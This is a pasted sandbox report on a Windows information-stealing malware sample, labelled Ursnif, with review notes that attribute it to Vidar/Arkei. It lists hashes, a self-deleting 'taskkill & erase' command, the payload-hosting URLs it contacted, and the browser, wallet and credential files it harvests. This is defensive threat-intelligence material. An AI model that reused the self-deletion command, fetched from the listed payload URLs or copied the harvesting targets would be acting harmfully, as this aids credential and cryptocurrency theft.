
Ursnif_6cc70fb7b014fe253989338d5008381d_exe_2019-07-22_19_30.txt

Jul 22nd, 2019
  1.  
  2. * MalFamily: "Ursnif"   (NOTE(review): this label appears to mirror the submitted file name rather than the observed behaviour. The report's own evidence — retrieval of the Mozilla NSS libraries freebl3.dll / mozglue.dll / nss3.dll / softokn3.dll plus the VC runtime DLLs from otnet.xyz, a geolocation lookup against ip-api.com, a C:\ProgramData\<random>\files\ staging tree holding passwords.txt, information.txt, screenshot.jpg, browser Cookies/Autofill/CC/History dumps, Wallets\ and Soft\Authy, and the IDS hit "ET TROJAN Vidar/Arkei Stealer Client Data Upload" — is characteristic of the Vidar/Arkei stealer family, not of Ursnif/Gozi. Treat the family attribution as unconfirmed until the binary itself is examined.)
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Ursnif_6cc70fb7b014fe253989338d5008381d.exe"
  7. * File Size: 664576
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "83502653aa68b492d6382416ecc27a7350be45968211f117ab2a860fb5fe093d"
  10. * MD5: "6cc70fb7b014fe253989338d5008381d"
  11. * SHA1: "eaab87820e5da8b64eb2d2bc2e2bbbac3a43130f"
  12. * SHA512: "e4dbdaaac28eeb15ea6cbd3554090f2883a4a905681269ac72380480d9cc51dc2f079ba7fc37bfe8534d94ffd0629e8bfbcc6c45980ed0300aae9369ad72f01a"
  13. * CRC32: "2349236C"
  14. * SSDEEP: "12288:EGolQnTahriSgWOGi80bfjPpBGxP7+BubZa3BR/mLV09J569buuKa1:EGR+hriSgUi80DOxVa3mLuJ569Cub1"
  15.  
  16. * Process Execution:
  17. "Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
  18. "cmd.exe",
  19. "taskkill.exe",
  20. "services.exe",
  21. "svchost.exe",
  22. "WmiPrvSE.exe",
  23. "taskhost.exe",
  24. "sc.exe",
  25. "svchost.exe",
  26. "svchost.exe",
  27. "WerFault.exe",
  28. "wermgr.exe"
  29.  
  30.  
  31. * Executed Commands:
  32. "C:\\ProgramData\\JCXFRDIE2I.exe ",
  33. "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe & exit",   (NOTE(review): self-deletion routine — the sample spawns cmd.exe to kill its own image and erase the original file from %TEMP%; the "Deleted Files" section confirms the erase succeeded. A cmd.exe child of a binary in a user-writable path running `taskkill /im <parent> /f & erase <parent>` is a useful detection pattern on its own, independent of the family label.)
  34. "C:\\Windows\\system32\\lsass.exe",
  35. "taskhost.exe $(Arg0)",
  36. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  37. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  38. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  39. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  40. "taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f",
  41. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  42. "C:\\Windows\\system32\\WerFault.exe -u -p 2776 -s 288",
  43. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\""
  44.  
  45.  
  46. * Signatures Detected:
  47.  
  48. "Description": "At least one process apparently crashed during execution",
  49. "Details":
  50.  
  51.  
  52. "Description": "Creates RWX memory",
  53. "Details":
  54.  
  55.  
  56. "Description": "A process attempted to delay the analysis task.",
  57. "Details":
  58.  
  59. "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"   (NOTE(review): WmiPrvSE.exe is the Windows WMI provider host, not the sample or a process the sample spawned; this sleep is most likely an artifact of the analysis environment and should not be read as sandbox evasion by the sample.)
  60.  
  61.  
  62.  
  63.  
  64. "Description": "A process created a hidden window",
  65. "Details":
  66.  
  67. "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\ProgramData\\JCXFRDIE2I.exe"
  68.  
  69.  
  70. "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\Windows\\System32\\cmd.exe"
  71.  
  72.  
  73.  
  74.  
  75. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  76. "Details":
  77.  
  78. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  79.  
  80.  
  81. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  82.  
  83.  
  84. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  85.  
  86.  
  87. "suspicious_request": "http://otnet.xyz/141"
  88.  
  89.  
  90. "suspicious_request": "http://otnet.xyz/freebl3.dll"
  91.  
  92.  
  93. "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  94.  
  95.  
  96. "suspicious_request": "http://otnet.xyz/mozglue.dll"
  97.  
  98.  
  99. "suspicious_request": "http://otnet.xyz/msvcp140.dll"
  100.  
  101.  
  102. "suspicious_request": "http://otnet.xyz/nss3.dll"
  103.  
  104.  
  105. "suspicious_request": "http://otnet.xyz/softokn3.dll"
  106.  
  107.  
  108. "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
  109.  
  110.  
  111. "suspicious_request": "http://ip-api.com/line/"
  112.  
  113.  
  114. "suspicious_request": "http://otnet.xyz/"
  115.  
  116.  
  117. "suspicious_request": "http://bookyeti.com/img/3001.exe"
  118.  
  119.  
  120.  
  121.  
  122. "Description": "Performs some HTTP requests",
  123. "Details":
  124.  
  125. "url": "http://otnet.xyz/141"
  126.  
  127.  
  128. "url": "http://otnet.xyz/freebl3.dll"
  129.  
  130.  
  131. "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  132.  
  133.  
  134. "url": "http://otnet.xyz/mozglue.dll"
  135.  
  136.  
  137. "url": "http://otnet.xyz/msvcp140.dll"
  138.  
  139.  
  140. "url": "http://otnet.xyz/nss3.dll"
  141.  
  142.  
  143. "url": "http://otnet.xyz/softokn3.dll"
  144.  
  145.  
  146. "url": "http://otnet.xyz/vcruntime140.dll"
  147.  
  148.  
  149. "url": "http://ip-api.com/line/"
  150.  
  151.  
  152. "url": "http://otnet.xyz/"
  153.  
  154.  
  155. "url": "http://bookyeti.com/img/3001.exe"
  156.  
  157.  
  158.  
  159.  
  160. "Description": "Deletes its original binary from disk",
  161. "Details":
  162.  
  163.  
  164. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  165. "Details":
  166.  
  167. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13574119 times"   (NOTE(review): services.exe (PID 500) is the Service Control Manager, which was busy handling the service starts listed under "Started Service" (VaultSvc, WerSvc, W32Time); the API-call volume is almost certainly a monitoring artifact of a system process rather than sample-driven anti-analysis. Do not use this as an evasion indicator.)
  168.  
  169.  
  170.  
  171.  
  172. "Description": "Attempts to execute a binary from a dead or sinkholed URL",
  173. "Details":
  174.  
  175. "dead_binary": "c:\\programdata\\jcxfrdie2i.exe"   (NOTE(review): this is the file the sample wrote to C:\ProgramData (with a Zone.Identifier stream, see "Modified Files") and then launched as a hidden window. The only executable requested over HTTP in this run is http://bookyeti.com/img/3001.exe, so this is plausibly that secondary payload saved under a random name; the "dead URL" verdict indicates the download did not yield a runnable binary at analysis time. Keep both the URL and the dropped-file path as IOCs, but expect the second-stage content to be unverifiable from this report.)
  176.  
  177.  
  178.  
  179.  
  180. "Description": "Steals private information from local Internet browsers",
  181. "Details":
  182.  
  183. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  184.  
  185.  
  186. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt"
  187.  
  188.  
  189. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  190.  
  191.  
  192. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  193.  
  194.  
  195. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt"
  196.  
  197.  
  198. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  199.  
  200.  
  201. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt"
  202.  
  203.  
  204.  
  205.  
  206. "Description": "Collects information about installed applications",
  207. "Details":
  208.  
  209. "Program": "Google Update Helper"
  210.  
  211.  
  212. "Program": "Microsoft Excel MUI 2013"
  213.  
  214.  
  215. "Program": "Microsoft Outlook MUI 2013"
  216.  
  217.  
  218.  
  219.  
  220. "Program": "Google Chrome"
  221.  
  222.  
  223. "Program": "Adobe Flash Player 29 NPAPI"
  224.  
  225.  
  226. "Program": "Adobe Flash Player 29 ActiveX"
  227.  
  228.  
  229. "Program": "Microsoft DCF MUI 2013"
  230.  
  231.  
  232. "Program": "Microsoft Access MUI 2013"
  233.  
  234.  
  235. "Program": "Microsoft Office Proofing Tools 2013 - English"
  236.  
  237.  
  238. "Program": "Adobe Acrobat Reader DC"
  239.  
  240.  
  241. "Program": "Microsoft Office Proofing Tools 2013 - Español"
  242.  
  243.  
  244. "Program": "Microsoft Publisher MUI 2013"
  245.  
  246.  
  247. "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
  248.  
  249.  
  250. "Program": "Microsoft Office Shared MUI 2013"
  251.  
  252.  
  253. "Program": "Microsoft Office OSM MUI 2013"
  254.  
  255.  
  256. "Program": "Microsoft InfoPath MUI 2013"
  257.  
  258.  
  259. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  260.  
  261.  
  262. "Program": "Microsoft Word MUI 2013"
  263.  
  264.  
  265. "Program": "Microsoft Groove MUI 2013"
  266.  
  267.  
  268.  
  269.  
  270. "Program": "Microsoft Access Setup Metadata MUI 2013"
  271.  
  272.  
  273. "Program": "Microsoft Office OSM UX MUI 2013"
  274.  
  275.  
  276. "Program": "Java Auto Updater"
  277.  
  278.  
  279. "Program": "Microsoft PowerPoint MUI 2013"
  280.  
  281.  
  282. "Program": "Microsoft Office Professional Plus 2013"
  283.  
  284.  
  285. "Program": "Adobe Refresh Manager"
  286.  
  287.  
  288. "Program": "Microsoft Office Proofing 2013"
  289.  
  290.  
  291. "Program": "Microsoft Lync MUI 2013"
  292.  
  293.  
  294.  
  295.  
  296. "Program": "Microsoft OneNote MUI 2013"
  297.  
  298.  
  299.  
  300.  
  301. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  302. "Details":
  303.  
  304.  
  305. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  306. "Details":
  307.  
  308.  
  309. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  310. "Details":
  311.  
  312. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  313.  
  314.  
  315. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  316.  
  317.  
  318. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b"
  319.  
  320.  
  321. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\*.*"
  322.  
  323.  
  324. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  325.  
  326.  
  327. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\*.*"
  328.  
  329.  
  330. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
  331.  
  332.  
  333. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\"
  334.  
  335.  
  336. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  337.  
  338.  
  339. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\*.*"
  340.  
  341.  
  342. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\"
  343.  
  344.  
  345. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  346.  
  347.  
  348. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\"
  349.  
  350.  
  351. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  352.  
  353.  
  354. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\*.*"
  355.  
  356.  
  357. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  358.  
  359.  
  360. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  361.  
  362.  
  363. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\"
  364.  
  365.  
  366. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\*.*"
  367.  
  368.  
  369. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  370.  
  371.  
  372. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\*.*"
  373.  
  374.  
  375. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  376.  
  377.  
  378. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  379.  
  380.  
  381. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\"
  382.  
  383.  
  384. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  385.  
  386.  
  387. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\*.*"
  388.  
  389.  
  390. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  391.  
  392.  
  393. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\"
  394.  
  395.  
  396. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\"
  397.  
  398.  
  399. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  400.  
  401.  
  402. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  403.  
  404.  
  405. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\*.*"
  406.  
  407.  
  408. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  409.  
  410.  
  411. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\*.*"
  412.  
  413.  
  414. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\"
  415.  
  416.  
  417. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  418.  
  419.  
  420. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  421.  
  422.  
  423. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\"
  424.  
  425.  
  426. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\*.*"
  427.  
  428.  
  429. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  430.  
  431.  
  432. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\*.*"
  433.  
  434.  
  435. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  436.  
  437.  
  438. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  439.  
  440.  
  441. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\"
  442.  
  443.  
  444. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\*.*"
  445.  
  446.  
  447. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\"
  448.  
  449.  
  450. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  451.  
  452.  
  453. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  454.  
  455.  
  456. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\*.*"
  457.  
  458.  
  459. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  460.  
  461.  
  462. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  463.  
  464.  
  465. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\"
  466.  
  467.  
  468. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  469.  
  470.  
  471. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\"
  472.  
  473.  
  474. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\*.*"
  475.  
  476.  
  477. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  478.  
  479.  
  480. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  481.  
  482.  
  483. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\"
  484.  
  485.  
  486. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\*.*"
  487.  
  488.  
  489. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  490.  
  491.  
  492. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  493.  
  494.  
  495. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\"
  496.  
  497.  
  498. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\*.*"
  499.  
  500.  
  501. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  502.  
  503.  
  504. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  505.  
  506.  
  507. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
  508.  
  509.  
  510. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  511.  
  512.  
  513. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  514.  
  515.  
  516. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\"
  517.  
  518.  
  519. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\*.*"
  520.  
  521.  
  522. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  523.  
  524.  
  525. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\*.*"
  526.  
  527.  
  528. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  529.  
  530.  
  531. "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\"
  532.  
  533.  
  534.  
  535.  
  536. "Description": "Harvests credentials from local FTP client softwares",
  537. "Details":
  538.  
  539. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  540.  
  541.  
  542.  
  543.  
  544. "Description": "Harvests information related to installed instant messenger clients",
  545. "Details":
  546.  
  547. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  548.  
  549.  
  550.  
  551.  
  552. "Description": "Harvests information related to installed mail clients",
  553. "Details":
  554.  
  555. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  556.  
  557.  
  558. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  559.  
  560.  
  561. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  562.  
  563.  
  564. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  565.  
  566.  
  567. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  568.  
  569.  
  570. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  571.  
  572.  
  573. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  574.  
  575.  
  576.  
  577.  
  578. "Description": "Collects information to fingerprint the system",
  579. "Details":
  580.  
  581.  
  582. "Description": "Created network traffic indicative of malicious activity",
  583. "Details":
  584.  
  585. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"   (NOTE(review): this network signature directly contradicts the "Ursnif" MalFamily label at the top of the report and is consistent with the file-system and HTTP behaviour recorded above; the IDS attribution is the better-supported one.)
  586.  
  587.  
  588.  
  589.  
  590.  
  591. * Started Service:
  592. "VaultSvc",
  593. "WerSvc",
  594. "W32Time"
  595.  
  596.  
  597. * Mutexes:
  598. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  599. "Local\\WERReportingForProcess2776",
  600. "Global\\\\xe5\\x88\\x90\\xc2\\x90",
  601. "Global\\\\xed\\x95\\xb02",
  602. "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
  603.  
  604.  
  605. * Modified Files:
  606. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
  607. "C:\\ProgramData\\freebl3.dll",
  608. "C:\\ProgramData\\mozglue.dll",
  609. "C:\\ProgramData\\msvcp140.dll",
  610. "C:\\ProgramData\\nss3.dll",
  611. "C:\\ProgramData\\softokn3.dll",
  612. "C:\\ProgramData\\vcruntime140.dll",
  613. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\ld",
  614. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\historych",
  615. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
  616. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
  617. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\c",
  618. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
  619. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\wd",
  620. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
  621. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
  622. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy\\\\xec\\x90\\xa0\\xcd\\xb2\\xe0\\xb8\\xa8\\xc7\\x8b\\xeb\\x86\\x88\\xc7\\xb2\\xe9\\x95\\xb0\\xc8\\x83",
  623. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
  624. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
  625. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
  626. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
  627. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
  628. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
  629. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b",
  630. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum\\",
  631. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\",
  632. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC\\\r",
  633. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus\\",
  634. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash\\\r",
  635. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge\\",
  636. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash\\",
  637. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore\\",
  638. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\",
  639. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\",
  640. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\",
  641. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\",
  642. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\",
  643. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\",
  644. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\",
  645. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\",
  646. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD\\",
  647. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\",
  648. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin\\",
  649. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\",
  650. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\",
  651. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\",
  652. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\",
  653. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\",
  654. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\",
  655. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\",
  656. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX\\\r",
  657. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
  658. "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
  659. "C:\\ProgramData\\JCXFRDIE2I.exe",
  660. "C:\\ProgramData\\JCXFRDIE2I.exe:Zone.Identifier",
  661. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  662. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  663. "C:\\Windows\\sysnative\\LogFiles\\Scm\\16379d62-d2d1-45c7-a48c-f33b02ea0429",
  664. "\\??\\PIPE\\lsarpc",
  665. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
